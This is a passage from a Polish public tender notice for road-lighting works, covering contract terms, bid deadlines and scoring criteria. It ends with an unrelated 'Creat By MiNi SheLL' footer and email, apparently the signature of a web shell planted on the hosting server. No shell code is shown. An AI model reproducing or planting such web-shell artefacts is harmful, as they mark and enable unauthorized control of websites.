dzień złożenia podmiotowe środki dowodowe, o których mowa w pkt 10 IDW, przy czym:<br/>1) podmiotowe środki dowodowe o których mowa w pkt 10.8. IDW składa odpowiednio Wykonawca/Wykonawcy,<br/>który/którzy wykazuje/ą spełnianie warunku, w zakresie i na zasadach opisanych w pkt 8.2 IDW;<br/>2) dokumenty i oświadczenia o których mowa w pkt 10.7. IDW składa każdy z nich – nie dotyczy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonania zmian postanowień umowy w przypadkach określonych w Tomie<br/>IIProjektowane Postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-03-29 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gddkia.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-03-29 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-04-27</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Kryteria oceny ofert: a) Kryterium „Cena”: będzie rozpatrywana na podstawie ceny brutto za wykonanie<br/>przedmiotuzamówienia, podanej przez Wykonawcę na Formularzu Oferty. Zamawiający ofercie o najniżej cenie spośród<br/>ofertocenianych przyzna 60 punktów a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie<br/>mniejsza.b) W ramach kryterium „Okres gwarancji” punkty zostaną przyznane w skali punktowej od 0 do 20 punktów, na<br/>podstawieOferty Wykonawcy - Formularz „Kryteria pozacenowe” Kryterium „Okres gwarancji” nie dotyczy następujących<br/>elementówprzedmiotu zamówienia: Oznakowanie poziome grubowarstwowe. Pozostałe elementy Przedmiotu Umowy będą<br/>posiadały okres gwarancji jakości określony przez Wykonawcę w Formularzu„Kryteria pozacenowe” podlegający ocenie w<br/>ramach kryterium Okres gwarancji który wynosić będzie 36-60 miesięcyliczone od dnia podpisania protokołu odbioru<br/>końcowego robót bez wad istotnych. Okres gwarancji36 miesięcy – 0 pkt.Okres gwarancji 48 miesięcy – 10<br/>pkt.Okres gwarancji: 60 miesięcy – 20 pkt.c) W ramach kryterium „Doświadczenie Kierownika Zadania” punkty zostaną<br/>przyznane w skali punktowej od 0 do 20punktów, na podstawie Oferty Wykonawcy - Formularz „Kryteria pozacenowe”<br/>(Formularz 2.2) zawierający wykaz zadań.Kierownik Zadania – max. ilość punktów – 20.Punktowane będzie:Doświadczenie<br/>pełniąc funkcję/funkcje kierownicze, nadzorcze (od rozpoczęcia robót do ich zakończenia lub od podpisaniaumowy na<br/>świadczenie usługi nadzoru do zakończenia realizacji tej umowy) przy realizacji 1 zadania polegającego nawykonaniu<br/>budowy lub przebudowy oświetlenia drogowego na drodze publicznej (gminnej, powiatowej, wojewódzkiej lubkrajowej) o<br/>wartości robót co najmniej 60 000,00 zł brutto. Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt<br/>1 ustawy - Roboty budowlane<br/>Za 1 zadanie potwierdzające powyższe wymagania Wykonawca otrzyma 0 punktów. Za 2 zadania potwierdzające powyższe<br/>wymagania Wykonawca otrzyma 10 punktów.Za 3 i więcej zadań potwierdzających powyższe wymagania Wykonawca<br/>otrzyma 20 punktów.2. Zamówienie jest przewidziane do finansowania ze środków będących w dyspozycji Generalnego<br/>Dyrektora DrógKrajowych i Autostrad. 3. Zamawiający nie zastrzega obowiązek osobistego wykonania przez Wykonawcę<br/>kluczowychzadań. 4. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie żąda<br/>wskazaniaprzez Wykonawcę części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, oraz podania<br/>nazwewentualnych podwykonawców, jeżeli są już znani. Pozostałe wymagania dotyczące podwykonawstwa zostały<br/>określone wTomie II SWZ - Projektowane postanowienia umowy (PPU). 5. Wykonawca, przed podpisaniem umowy, jest<br/>zobowiązanydo wniesienia zabezpieczenia należytego wykonania umowy na kwotę stanowiącą 5 % ceny brutto podanej w<br/>ofercie. 6.Zamawiający nie przewiduje odbycia przez Wykonawcę wizji lokalnej lub sprawdzenia przez Wykonawcę<br/>dokumentówniezbędnych do realizacji zamówienia dostępnych na miejscu u Zamawiającego

Creat By MiNi SheLL
Email: jattceo@gmail.com